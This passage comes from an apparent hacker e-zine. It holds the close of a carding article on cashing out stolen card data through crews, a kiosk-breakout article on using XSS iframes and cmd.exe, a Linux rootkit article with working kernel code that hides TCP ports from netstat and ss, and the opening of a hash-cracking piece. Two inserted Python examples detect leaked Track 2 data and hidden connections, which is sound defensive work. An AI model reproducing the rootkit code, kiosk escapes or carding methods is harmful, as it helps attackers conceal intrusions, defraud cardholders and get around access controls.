1. Form a crew to work with, willing to cash out this data. Higher risk of law enforcement, lower
   risk of being scammed by those you work with.
2. Work with existing crews, often overseas. Lower risk of law enforcement, higher risk of being
   scammed by those you work with.

Existing crews work on a percentage basis, normally offering a high percentage to the card supplier,
and if the cash out is successful, will either return that percentage through Western Union or run
with the money. Typically, 'test cards' will be exchanged in order for these crews to prove their
authenticity.

Forming a crew usually means a localized operation, susceptible to investigation from local
authorities before any foreign law enforcement bodies are involved. I believe most crews will
operate in this manner: a localised crew, often employed by a gang or mafia to supply card data to
their superiors for resale (such as those sold online) or to be cashed out by a second team.
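The Track 2 layout described under "Converting Track Data" above is also what a defender looks for when checking whether card data has leaked into logs, tickets or exported files. The following is an added example, not part of the original article: it recognises PAN=YYMMSSS... strings, Luhn-checks the PAN, and redacts each hit; the log lines it scans are constructed, and 4111111111111111 is a widely published test PAN, not an account.

```python
"""Spot Track 2-formatted card data in text and Luhn-check the PAN.

Added example for the Track 2 layout described above (not code from the
original article). A DLP scan, a log review or incident triage can use the
same recognition to flag and redact stored track data. SAMPLE_LOG below is
constructed; 4111111111111111 is a widely published test PAN.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# PAN (13-19 digits), '=' field separator, YY, MM, 3-digit service code, then
# issuer discretionary data. Lookarounds stop a match inside a longer number.
TRACK2_RE = re.compile(r"(?<!\d)(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d{0,20})(?!\d)")


def luhn_ok(pan: str) -> bool:
    """True when the PAN's check digit satisfies the Luhn formula."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:        # every second digit from the right is doubled
            d = d * 2
            if d > 9:         # 10..18 -> digit sum, i.e. subtract 9
                d -= 9
        total += d
    return total % 10 == 0


@dataclass
class Track2Hit:
    pan: str
    expiry_year: str
    expiry_month: str
    service_code: str
    discretionary: str
    luhn_valid: bool

    def masked_pan(self) -> str:
        """First six and last four digits, the usual display form for a PAN."""
        return self.pan[:6] + "*" * (len(self.pan) - 10) + self.pan[-4:]


def parse_track2(s: str) -> Optional[Track2Hit]:
    """Split one Track 2 string into its fields; None if it is not one."""
    m = TRACK2_RE.fullmatch(s)
    if not m:
        return None
    pan, yy, mm, svc, disc = m.groups()
    if not 1 <= int(mm) <= 12:    # expiry month must be a real month
        return None
    return Track2Hit(pan, yy, mm, svc, disc, luhn_ok(pan))


def scan_text(text: str) -> List[Track2Hit]:
    """Return every Track 2-shaped string in text, Luhn-valid or not.

    A failed Luhn check is still reported: the string may be a test card, a
    typo in a stolen dump or an obfuscation attempt, and each deserves a look.
    """
    hits = []
    for m in TRACK2_RE.finditer(text):
        hit = parse_track2(m.group(0))
        if hit is not None:
            hits.append(hit)
    return hits


def redact_text(text: str) -> str:
    """Replace each detected Track 2 string with its masked PAN only."""
    def _sub(m):
        hit = parse_track2(m.group(0))
        return m.group(0) if hit is None else hit.masked_pan() + "=[REDACTED]"
    return TRACK2_RE.sub(_sub, text)


# Constructed sample: the article's example string, a Luhn-valid test PAN, and
# a decoy that has an '=' but is far too short to be a PAN.
SAMPLE_LOG = """\
2011-02-19 12:16:32 dump.txt: 5281169568596016=14101010000045100001
2011-02-19 12:17:01 dump.txt: 4111111111111111=1512201000000000000
2011-02-19 12:17:05 note: order 20110219=1234 is not track data
"""

if __name__ == "__main__":
    for h in scan_text(SAMPLE_LOG):
        print(h.masked_pan(), "exp", h.expiry_month + "/" + h.expiry_year,
              "svc", h.service_code, "luhn", h.luhn_valid)
    print(redact_text(SAMPLE_LOG))
```

The article's own example string fails the Luhn check, which is exactly why a scanner should report shape matches rather than silently dropping PANs that do not validate.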
[[ Conclusion ]]
------------

Through my experiences investigating the darker parts of the Internet, specifically carding and
fraud, trends show that vendors of card data and/or information tend to be from a Russian source. It
is my belief that the operations involved in the obtaining and distribution of this information are
largely mafia-based. I hope the information contained within this paper is enough to deter people
from the 'carding scene' rather than to take an interest in it for personal gain. The people
involved are generally small fish, but around every large forum I have visited there are people with
connections I'd dare not cross.

[==================================================================================================]

-=[ 0x06 Brief Notes on Retail Kiosk Hacking
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

If you've ever left your basement and ventured outside to the real world, you've more than likely
come into contact with a kiosk at some point in a store or hotel. Most kiosks provide only a
limited keyboard or run a very stripped down version of Windows, rendering certain actions difficult
or impossible to directly achieve, but that only makes it all the more fun. This is by no means an
exhaustive article on hacking retail kiosks, but instead a list of little tips and tricks I've
compiled through my own personal experiences that may either help you or provide inspiration when
approaching a new device.

In the MSP airport, there is a kiosk running software called SiteKiosk. The device provides
Internet access at outrageous prices ($20/hour), although complimentary access to the airport's
website and Weather.com is so thoughtfully offered.
As I sit typing this, my plane has been delayed about 3.5 hours due to the torrents of snow outside,
so I figured messing with the kiosk would give me something to do other than eating candy and
futilely waiting for the Boingo hotspot page to load. The keyboard is clunky and missing sensitive
keys like Ctrl and Alt; the mouse is a trackball with two buttons, though the right-click button
seems unresponsive. The web browser used by this kiosk looks very much like a version of Internet
Explorer themed with cleaner icons, and the file bar and taskbar are hidden from view.

With buttons like Ctrl and Alt missing or disabled, we obviously can't try special key combinations
like Ctrl+Alt+Del, so the first step is to poke around what we can do with the software. The fact
that we can access the airport's website and Weather.com is very curious, especially since the
advertisements load fine (which are hosted on third-party servers), yet putting anything in the URL
bar pops up a "please insert monies" box. Luckily, Weather.com has an XSS in their quick lookup,
so a simple search for zip code
injects an IFrame into the page, displaying our coveted search engine.

When a kiosk disallows access to the URL bar, whether it's trying to contain the user to a single
web site (think the online catalog at Staples stores) or reduce functionality (until the user forks
up their money), XSS is a good place to start. It is common enough that even if you don't come
prepared with a known XSS in the target website, it's usually a trivial matter to find one on the
spot. By injecting an IFrame, we gain the ability to browse any site we wish, as well as exercise
other web browser functionality that may escalate our access or provide further information about
the box.

At this point, we have achieved free Internet access (within the IFrame), but there are more
interesting things to do other than reading Reddit. A simple search for ha.ckers.org's iKat suite
leads us to a swiss army knife of tools to probe the system we're on.

Through this, we learn that our user-agent is:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; SiteKiosk 6.6 Build 213)

We can browse the filesystem by invoking the "Browse" form field, but unfortunately the lack of
right-click doesn't let us easily open files and execute programs. If right-click were enabled, we
would be able to browse to C:\Windows\system32\cmd.exe within the prompt, right-click the program,
and select open to spawn a shell. Explorer.exe is also another good place to start. Once cmd.exe is
open, we would be able to manipulate the system, probe local files or scan the network, or kill the
kiosk software using `tasklist` and `taskkill`.

Unfortunately, the ability to view My Computer also seemed disabled.
I did not spend a large amount of time probing the system or enumerating all of the tools provided
by iKat, but I did discover the existence of a file named trust-root.p7b on the Desktop which looked
interesting, along with a shortcut to the SiteKiosk software.

In a separate escapade, I was lucky enough to come across an Internet/printing kiosk in the lobby of
a Marriott hotel provided by a company called iBAHN. If I recall correctly, this too was running
SiteKiosk, but the interface looked very different from the kiosk I encountered in MSP, and it
provided a range of additional functions such as printing and access to Microsoft Office. The
device seemed to take great care not to give too much access to the user (the software provided its
own, more limited filesystem browser that was meant to open documents from flash drives), but it
wasn't perfect. By opening Microsoft Word, you could access Windows Explorer through the File menu,
or by navigating the help bar in online mode, right-clicking and selecting "View Source". This would
invoke Notepad with a File menu of its own. Viewing My Computer only showed the CD drive and the USB
stick that was currently plugged in, but it was possible to access C:\ simply by typing it in the
navigation bar.

There are plenty of kiosks around to play with, and many of them possess blatant holes in their
access restriction software. Even if there is nothing inherently interesting on the device, it
might be a good idea to check if it's connected to the network or if it dials home anywhere. Just
in general, it's fun to circumvent the software and snoop about the device, and of course things
like free Internet are always cool too. Some devices I've seen think they are clever, or are just
unstable, so working or reliable methods of accessing certain kiosks, such as the ones in Barnes &
Noble, are still to be determined. For instance, attempting to XSS the B&N website from their
in-store kiosk results in the device locking up and calling for employee assistance.
Other devices disable right-click, removing certain escalation opportunities and the ability to
access critical functionality necessary for an attack.

There is still much fun to be had, so if you have any tips, tricks, or your own kiosk-hacking
stories, drop us a message and your submission might just be in the next zine.

[==================================================================================================]

-=[ 0x07 Linux Rootkit Development Update
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/

In the Linux kernel version 2.6.36, some changes to the procfs API will break the interface that
previously existing rootkits have with /proc/net/tcp. This is a critical change as far as rootkit
functionality goes, since a new technique is required to hide TCP ports from userland administration
programs such as netstat(8) and other network statistics gathering tools. Thanks to fawx for
initially bringing this issue to my attention.

As a side note: if you have any questions about the intricacies of the Linux kernel, as we will be
working closely with it throughout the course of this paper, consult /usr/src/linux/Documentation or
any of the links provided as references at the bottom.

Prior to release of the 2.6.36 patch, most Linux rootkits utilized a sequential search of the
proc_net->subdir linked list to locate the procfs data structure corresponding to the filesystem
pathname /proc/net/tcp. The way that entries in the /proc/net directory are accessed changed in
2.6.36, and as a result the majority of publicly available Linux rootkits featuring TCP connection
hiding stopped compiling; some benign networking drivers ceased to function as well. The API wasn't
changed in order to safeguard against rootkits -- that was only an unintended side effect.

In reality, implementing a kernel-mode TCP data filtering mechanism is even easier with the new
interface. A new kernel function is dedicated specifically to the purpose of initializing the
/proc/net/tcp file.
Note that I'm using the term "file" loosely in this context, as procfs doesn't behave like a typical
filesystem that utilizes disk-based storage. In userland, when a file descriptor corresponding to a
procfs pathname is read(), the results are actually custom-formatted kernel data objects. That's why
/proc/net/tcp and, in fact, the majority of procfs pathnames, appear as empty files when the stat()
system call is executed on them. Although procfs files do have inodes, their values approach 2**32
(the upper limit for ino_t), and thus they are outside the range of use for partitioned disk
filesystems. Observe the differences in output between the following two commands:

$ stat /proc/net/tcp
  File: `/proc/net/tcp'
  Size: 0               Blocks: 0          IO Block: 1024   regular empty file
Device: 3h/3d   Inode: 4026531957  Links: 1
Access: (0444/-r--r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2011-02-19 12:16:32.853287891 -0500
Modify: 2011-02-19 12:16:32.853287891 -0500
Change: 2011-02-19 12:16:32.853287891 -0500
 Birth: -

$ stat /bin/ls
  File: `/bin/ls'
  Size: 109736          Blocks: 224        IO Block: 4096   regular file
Device: 303h/771d       Inode: 7660308     Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2010-12-25 23:33:12.000000000 -0500
Modify: 2010-12-24 12:18:47.000000000 -0500
Change: 2010-12-24 12:19:01.000000000 -0500
 Birth: -

As you can see, the procfs pathname has a rather large inode number and a file size of 0, despite
the fact that we would receive data back if we ran `cat` against it. In the preceding examples, the
/usr/bin/stat binary (provided by the GNU coreutils package) executed the fstat() system call
against the absolute pathnames given as arguments. In this next typescript, statfs() will be run
due to the "-f" command line option, which is an abbreviated form of the getopt_long() option
"--file-system", as documented in the stat(1) man page and GNU info pages.
$ stat -f /boot
  File: "/boot"
    ID: f6c5e14bf02df87f Namelen: 255     Type: ext2/ext3
Block size: 1024       Fundamental block size: 1024
Blocks: Total: 32175      Free: 11084      Available: 9423
Inodes: Total: 8320       Free: 8266

$ stat -f /proc
  File: "/proc"
    ID: 0        Namelen: 255     Type: proc
Block size: 4096       Fundamental block size: 4096
Blocks: Total: 0          Free: 0          Available: 0
Inodes: Total: 0          Free: 0

Clearly, procfs is special since the majority of its statistical information is zeroed out. The
glaring contrast in block size results from extfs handling disk blocks, whereas procfs handles
memory, as stated previously. On my x86-64 kernel, getpagesize() from unistd.h returns 4096.
However, page size is platform dependent, so your mileage may vary. Note that sysfs behaves in a
manner identical to procfs according to statfs(). If your kernel is configured to support sysfs,
you'll find it listed under /sys in your /etc/mtab. The directory that rootkit developers would
probably want to concern themselves the most with is /sys/kernel. Again, depending on your
/usr/src/linux/.config or /proc/config.gz settings during the kernel's compile-time, various
subdirectories could be available under /sys/kernel. My machine has the debug, security, and mm
(memory manager) directories enabled currently. Now that we've gotten the basics squared away, let's
take a look at a rootkit:

struct proc_dir_entry *proc_find_tcp()
{
    struct proc_dir_entry *p = proc_net->subdir;

    while (strcmp(p->name, "tcp"))
        p = p->next;

    return p;
}

This is from adore-ng-0.56, a rootkit I downloaded from packetstormsecurity.org. The code above
shows the tediousness involved in accessing pathnames under the /proc/net directory. Since the
kernel didn't have any direct access functions defined, it became necessary to loop over the
directory entries manually.
The last kernel version to be supported by this particular adore-ng release appears to be 2.6.16,
judging by some conditional preprocessor directives within the source:

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,16)
MODULE_PARM(root_fs, "s");
MODULE_PARM(proc_fs, "s");
MODULE_PARM(opt_fs, "s");
#else
module_param(root_fs, charp, 0644);
module_param(proc_fs, charp, 0644);
module_param(opt_fs, charp, 0644);
#endif

It looks as if prior to 2.6.16 there was less convenient syntax available for those developing
Loadable Kernel Modules (LKMs). At the time of writing this article, the latest stable Linux kernel
is 2.6.37.1. However, I'll be using gentoo-sources-2.6.37 from the Gentoo portage tree. For the sake
of consistency, let's double check the current kernel versions:

$ finger @kernel.org
[kernel.org]
The latest linux-next version of the Linux kernel is:           next-20110218
The latest snapshot 2.6 version of the Linux kernel is:         2.6.38-rc5-git5
The latest mainline 2.6 version of the Linux kernel is:         2.6.38-rc5
The latest stable 2.6.37 version of the Linux kernel is:        2.6.37.1
The latest stable 2.6.36 version of the Linux kernel is:        2.6.36.4
The latest longterm 2.6.35 version of the Linux kernel is:      2.6.35.11
The latest stable 2.6.35 version of the Linux kernel is:        2.6.35.9
The latest longterm 2.6.34 version of the Linux kernel is:      2.6.34.8
The latest stable 2.6.34 version of the Linux kernel is:        2.6.34.7
The latest longterm 2.6.32 version of the Linux kernel is:      2.6.32.29
The latest stable 2.6.32 version of the Linux kernel is:        2.6.32.28
The latest longterm 2.6.27 version of the Linux kernel is:      2.6.27.58
The latest stable 2.6.27 version of the Linux kernel is:        2.6.27.57
The latest stable 2.4.37 version of the Linux kernel is:        2.4.37.11

In 2.6.36, the pointer to the global proc_net structure variable (seen in the adore-ng-0.56 code
above) disappeared.
After grepping around through the kernel source code a bit, I realized that the functionality had
been so heavily modified that I wasn't sure where to hook into /proc/net/tcp from. I was able to
grep /boot/System.map for procfs-related symbols and realized it was going to be a lot easier than I
thought. I found a tcp_proc_register function that allowed me to re-create /proc/net/tcp. Also, the
proc_net structure that was being referenced by adore-ng had now become init_net. So, I simply
deleted the existing /proc/net/tcp with proc_net_remove and re-initialized it with the address of a
custom struct (just to clarify, we are right now working inside the kernel):

static struct tcp_seq_afinfo tcp4_seq_afinfo = {
    .name     = "tcp",
    .family   = AF_INET,
    .seq_fops = { .owner = THIS_MODULE },
    .seq_ops  = { .show = new_tcp4_seq_show }
};

To understand what's going on here, one needs to realize that procfs makes itself appear to userland
as any other filesystem would. It exposes various functions for operating on the files and
directories themselves, e.g., open, read, readdir, seek, etc. That's where the new_tcp4_seq_show
function comes in. The relative pathname to the file where the real tcp4_seq_show is defined is
net/ipv4/tcp_ipv4.c (as documented by Documentation/networking/proc_net_tcp.txt). The
new_tcp4_seq_show function is a malicious wrapper which invokes the legitimate tcp4_seq_show
function, unless it's determined that the TCP connection currently being processed by a read
operation on /proc/net/tcp corresponds to a port number that is intended to be hidden by the
rootkit. In that case, new_tcp4_seq_show will not construct the usual hexadecimal-encoded string
that describes the connection.
static int (*old_tcp4_seq_show)(struct seq_file *seq, void *v) = 0;

// Array initialization syntax must be zero-terminated
static const unsigned short hidden_ports[] = {6666, 7777, 888, 999, 0};

static int new_tcp4_seq_show(struct seq_file *seq, void *v)
{
    const signed int retval = old_tcp_seq_show(seq, v);
    register unsigned short i = 0;
    static unsigned int line = 0;
    auto char hex_port[8] = { 0 }, *offset = seq->buf + seq->count - NET_LINE;

    if(v == SEQ_START_TOKEN)
        return line = 0, retval;

    for(i = 0; hidden_ports[i]; i++) {
        sprintf(hex_port, ":%04X", hidden_ports[i]);

        if(strstr(offset, hex_port))
            return seq->count -= NET_LINE, retval;
    }

    sprintf(offset, "% 4i", line++);

    return offset[4] = ':', retval;
}

The old_tcp_seq_show identifier is simply a function pointer to the original tcp4_seq_show function
that was assigned to the .seq_ops member of the tcp_seq_afinfo structure, whose definition was shown
above. To reiterate, our new_tcp4_seq_show function is wrapping the real tcp4_seq_show function. The
introduction of our wrapper function to the traditional kernel control flow effectively hides
certain ports from userland by looping over an array that contains the rogue port numbers. In this
way, running a command such as netstat will not display the TCP connections that have been hidden
from /proc/net/tcp.

The hidden_ports array is specified with the C language keywords "static" and "const." These prevent
the initialized port numbers from being accessed from outside of the current source file and from
having the values modified after compilation. Also, the hidden_ports array is defined to be of type
"unsigned short" because the source and destination port fields in TCP packet headers are
non-negative and 16 bits wide. Section 3.1 of RFC793 demonstrates this with an ASCII art
representation.
    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Now, to formally register our new /proc/net/tcp mechanisms, we first remove the original, then pass
pointers to the data structures representing the /proc/net directory and our new tcp entry within
it. Simply invoke the appropriate functions when initializing the Loadable Kernel Module. The
module_init macro tells the compiler which function to execute when using insmod on the compiled .ko
(kernel object) code file.

static int __init init_hidetcp(void)
{
    proc_net_remove(&init_net, "tcp");
    tcp_proc_register(&init_net, &tcp4_seq_afinfo);

    return 0;
}

module_init(init_hidetcp);

Let's go ahead and test it out to make sure everything works. After compiling the rootkit itself
with GNU make and inserting the module into the kernel, we'll use netstat with the "-tW" command
line flags so only TCP connections are displayed and the wide display format will allow us to view
DNS hostnames in their entirety. One of the hidden port numbers we defined in the hidden_ports array
was 7777, so let's see if netstat detects a connection on that port.

$ gmake
$ insmod hidetcp.ko
$ telnet us.undernet.org 7777
Trying 208.83.20.130...
Connected to us.undernet.org
Escape character is '^]'.
^]
telnet> z
[1]+  Stopped                 telnet us.undernet.org 7777
$ netstat -tW
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address                    State
tcp        0      0 alien.localdomain:51889 please.dont.hacktheinter.net:6697  ESTABLISHED
$

So far, we've seen how to hide TCP connections to or from certain port numbers from userland
programs that read from procfs. However, there's another way to access information about TCP
connections using rtnetlink(3). You can determine if a given program is using procfs or a netlink
protocol by tracing for the respective function calls.
$ whatis netlink
netlink (3)          - Netlink macros
netlink (7)          - Communication between kernel and userspace (AF_NETLINK)
$ strace -fe trace=open,socket netstat -tW 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
open("/proc/net/tcp", O_RDONLY)         = 3
open("/proc/net/tcp6", O_RDONLY)        = -1 ENOENT (No such file or directory)
$ strace -fe trace=open,socket ./ss 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
socket(PF_NETLINK, SOCK_RAW, 4)         = 3

The ss binary being traced above is a piece of code distributed with iproute2 that retrieves socket
statistics. Iproute2 has a Wikipedia article at http://en.wikipedia.org/wiki/Iproute2 with some
helpful links to get you up to speed.

Some have probably noticed that the raw socket option is succeeding despite the fact that my current
prompt setting reflects that of a non-root user. Since the PF_NETLINK integer constant is the first
argument instead of PF_INET, the kernel has no issue with providing a positive return value.

Please note that rtnetlink isn't the only netlink protocol in existence -- there are many more; far
too many to mention here. There have been many academic research papers published on the subject of
netlink over the past decade or so. One of the latest and most interesting is entitled
"Communicating between the kernel and user-space in Linux using Netlink sockets" by Ayuso, Gasca and
Lefevre. The types of security-related operations it's capable of performing alone are extremely
comprehensive. For instance: detecting and mitigating DDoS attacks, subliminal channels between
processes with disparate privileges, multicasting a single communications channel to multiple system
users, implementing a dynamic routing protocol like Open Shortest Path First in userland, detecting
network interfaces with promiscuous mode enabled, etc.

In this particular scenario, usage of only a specific aspect of netlink is necessary to accomplish
the final goal of TCP connectivity that's as low-key as possible.
Since connections hidden from /proc/net/tcp can still be viewed via the netlink socket interface,
another technique must be used to avoid such disclosure. Here's another example typescript (`man
script`) of the ss program from the misc directory in iproute2's source tree as it executes on the
standard output stream:

$ ./ss
State      Recv-Q Send-Q      Local Address:Port          Peer Address:Port
ESTAB      0      0           192.168.1.100:56921        72.14.204.147:80
ESTAB      0      0           192.168.1.100:51237        184.27.36.110:22

In this case, the two TCP sockets listed are both in a connection established state. The four empty
message queue values being shown mean that the kernel has delivered all pending data transmissions
to and from the socket as of the current runtime. The code that handles Internet diagnostics
monitoring for the Linux kernel's rtnetlink protocol is located in
/usr/src/linux/net/ipv4/inet_diag.c, and /usr/src/linux/include/linux/inet_diag.h is of course the
associated header file. TCP-specific code is located elsewhere. However, we can simply disable all
TCP socket diagnostics without referencing any of the tcp_inet_diag oriented source files. The
following short code snippet inserted into the rootkit module's initialization function is
sufficient to prevent netlink from utilizing any TCP socket monitoring methods whatsoever:

static struct inet_diag_handler h;

h.idiag_type = TCPDIAG_GETSOCK;
inet_diag_unregister(&h);

Don't forget to include linux/inet_diag.h. Now iproute2's ss binary won't output any TCP connections
at all, since the handler responsible for the message type it was processing has now been removed.
It works, but it would be even better by only allowing Internet socket diagnostics for connections
whose source and destination port numbers don't match our blacklist. The full inet_diag_handler
structure must be filled out, and inet_diag_register should be invoked as well. This is similar to
passing the tcp_seq_afinfo structure to tcp_proc_register as outlined in the previous technique.
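Both hiding techniques described above leave the kernel's two views of the socket table disagreeing: the seq_show wrapper removes lines from /proc/net/tcp while netlink still reports the connection, and unregistering the TCP inet_diag handler makes ss report nothing while procfs still lists everything. That disagreement is what a host check can look for. The following is an added example, not code from the article: it parses a /proc/net/tcp dump and `ss -tn` output and reports connections present in one view but absent from the other; both snapshots are constructed, in the formats shown earlier, for a little-endian x86 host.

```python
"""Cross-check the procfs and netlink views of TCP connections.

Added example for the two hiding techniques described above (this is not
code from the original article). Filtering lines out of /proc/net/tcp makes
netstat(8) lie while ss(8), which asks the kernel over netlink, still sees
the connection; unregistering the TCP inet_diag handler does the reverse.
Either way the two kernel views disagree, and that disagreement is the
signal a host check can look for. The snapshots below are constructed in
the formats of /proc/net/tcp and `ss -tn` on a little-endian x86 host.
"""
import socket
import struct
from typing import Dict, Set, Tuple

Conn = Tuple[str, int, str, int]  # (local ip, local port, remote ip, remote port)

# Values of the 'st' column in /proc/net/tcp (the kernel's TCP state enum).
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}


def decode_endpoint(field: str) -> Tuple[str, int]:
    """Decode an 'ADDR:PORT' cell such as '0100007F:0016' -> ('127.0.0.1', 22).

    The kernel prints the in-memory __be32 address with %08X, so on a
    little-endian host the bytes come out reversed; the port is plain hex.
    """
    addr_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text: str) -> Dict[Conn, str]:
    """Map each connection in a /proc/net/tcp dump to its state name."""
    conns: Dict[Conn, str] = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] == "sl":   # skip the header row
            continue
        lip, lport = decode_endpoint(fields[1])
        rip, rport = decode_endpoint(fields[2])
        conns[(lip, lport, rip, rport)] = TCP_STATES.get(fields[3], fields[3])
    return conns


def parse_ss(text: str) -> Set[Conn]:
    """Collect the connections listed by `ss -tn` (the netlink inet_diag view)."""
    conns: Set[Conn] = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] == "State":   # skip the header row
            continue
        lip, lport = fields[3].rsplit(":", 1)
        rip, rport = fields[4].rsplit(":", 1)
        conns.add((lip, int(lport), rip, int(rport)))
    return conns


def compare_views(procfs: Set[Conn], netlink: Set[Conn]) -> Dict[str, Set[Conn]]:
    """Connections present in one kernel view but missing from the other.

    hidden_from_procfs  : seen via netlink only  (the seq_show wrapper above)
    hidden_from_netlink : seen via procfs only   (inet_diag_unregister above)
    """
    return {
        "hidden_from_procfs": netlink - procfs,
        "hidden_from_netlink": procfs - netlink,
    }


# Constructed: a filtered /proc/net/tcp; the connection to port 7777 is gone.
PROC_NET_TCP_SNAPSHOT = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 6401A8C0:DE59 93CC0E48:0050 01 00000000:00000000 00:00000000 00000000  1000        0 16241
   1: 6401A8C0:C825 6E241BB8:0016 01 00000000:00000000 00:00000000 00000000  1000        0 16305
"""

# Constructed: the netlink view still lists all three connections.
SS_SNAPSHOT = """\
State      Recv-Q Send-Q Local Address:Port    Peer Address:Port
ESTAB      0      0      192.168.1.100:56921   72.14.204.147:80
ESTAB      0      0      192.168.1.100:51237   184.27.36.110:22
ESTAB      0      0      192.168.1.100:51902   208.83.20.130:7777
"""

# Constructed: the netlink view after the TCP inet_diag handler was unregistered.
SS_SNAPSHOT_NO_DIAG = """\
State      Recv-Q Send-Q Local Address:Port    Peer Address:Port
"""

if __name__ == "__main__":
    procfs_view = parse_proc_net_tcp(PROC_NET_TCP_SNAPSHOT)
    for label, snap in (("seq_show filter", SS_SNAPSHOT),
                        ("inet_diag removed", SS_SNAPSHOT_NO_DIAG)):
        diff = compare_views(set(procfs_view), parse_ss(snap))
        print(label, {k: sorted(v) for k, v in diff.items()})
```

On a live host the two inputs are the contents of /proc/net/tcp and the output of `ss -tn`; a non-empty set in either direction means the two kernel views disagree and the host deserves a closer look.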
A brief outline tracing nested structure members back to actual port values follows. However,
putting that concept into compilable rootkit source code form will be left as an exercise for the
reader.

include/net/inet_sock.h
112 struct inet_sock {
113         __be16                  inet_dport;
114         __be16                  inet_sport;
115 }

include/net/inet_connection_sock.h
 86 struct inet_connection_sock {
 87         /* inet_sock has to be the first member! */
 88         struct inet_sock          icsk_inet;

include/linux/tcp.h
292 struct tcp_sock {
293         /* inet_connection_sock has to be the first member of tcp_sock */
294         struct inet_connection_sock     inet_conn;

net/ipv4/tcp_diag.c
 20 static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
 21                               void *_info)
 22 {
 23         const struct tcp_sock *tp = tcp_sk(sk);

For more information on Linux kernel development, check out:

 - The Linux Kernel Newbies site
   http://kernelnewbies.org/
 - The linux-kernel mailing list FAQ
   http://www.tux.org/lkml/
 - The Linux Kernel Hackers' Guide from the Linux Documentation Project
   http://tldp.org/LDP/khg/HyperNews/get/khg.html (highly recommended)
 - And, of course, the main Linux Kernel Archives site
   http://kernel.org

[==================================================================================================]

-=[ 0x08 High Performance Hash Cracking with MapReduce, Part 2
-=[ Author: elchupathingy
-=[ IRC: irc.gonullyourself.org #gny

/----------------------------------------------------------------------------------------
|
| Introduction
|

The last article talked about the basic theory of MapReduce and a few examples of how it can be
used. The options for MapReduce are not limited to those mentioned, but they are the easiest ones
to understand the concept of breaking up larger tasks and passing this information on to other
nodes.
For this article, we will focus more on the code aspect of MapReduce instead of the higher-level
concepts.

/----------------------------------------------------------------------------------------
|
| Background
|

The very basic implementation of MapReduce shown here is something that can be expanded upon
easily. It provides the method of automatic data pre-processing and automatic post-processing.
But, being a simple implementation, there are problems with some of the mechanics inside the code.
Though, that is left to someone else to fix. By familiarizing yourself with the algorithm, and
stepping through the code, it should be a trivial matter to have yourself a fully functioning
MapReduce implementation.

/----------------------------------------------------------------------------------------
|
| Theory
|

To recap: The idea behind MapReduce is quite simple to grasp, but its layout is detailed and may
lead to confusion at times. Here is a look at a typical layout of a MapReduce network:

 /------\     /-----------+-----------+-----------+-----------+-----------\
 |Master|-----/           |           |           |           |           |
 \------/              /------\    /------\    /------\    /------\    /------\
                       |Mapper|    |Mapper|    |Mapper|    |Mapper|    |Mapper|
                       \------/    \------/    \------/    \------/    \------/
                          |           |           |           |           |
                      /-------\   /-------\   /-------\   /-------\   /-------\
                      |Reducer|   |Reducer|   |Reducer|   |Reducer|   |Reducer|
                      \-------/   \-------/   \-------/   \-------/   \-------/
                          |           |           |           |           |
                          \-----------+-----------+-----------+-----------/
                                                  |
                                             /---------\
                                             |Answer!!!|
                                             \---------/

Now that's a picture. This network layout has two key characteristics to it:

  1) Series of Mappers
  2) Series of Reducers

These two things are the meat of the MapReduce concept. Now, what exactly is MapReduce?
It's formally defined as the following:

  /------------------------------------------------------------------------------------
  |MapReduce is a framework for processing huge datasets on certain kinds of
  |distributable problems using a large number of computers (nodes), collectively
  |referred to as a cluster. Computational processing can occur on data stored either
  |in a filesystem (unstructured) or within a database (structured).
  |                                                                        - Wikipedia

Now that that's out of the way, let's move onto real code and see how this works in the given
implementation. Firstly, what software is providing the backend infrastructure? The implementation
relies on the following:

  Web server: Apache or whatever you have as long as it supports PHP.
  MySQL

That's it. The clients run from php-cli but can also be called by the web server if desired. The
MySQL tables that the scripts interact with are very simple:

  /------------------------------------------------------------------------------------
  | CREATE TABLE IF NOT EXISTS `node` (
  |   `id` varchar(32) NOT NULL,
  |   `type` int(11) NOT NULL,
  |   `job_id` varchar(32) NOT NULL,
  |   `last_connect` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  |   UNIQUE KEY `id` (`id`)
  | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
  |
  | CREATE TABLE IF NOT EXISTS `job` (
  |   `id` varchar(32) NOT NULL,
  |   `status` int(11) NOT NULL,
  |   `time_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  |   `mappers` int(11) NOT NULL,
  |   `reducers` int(11) NOT NULL,
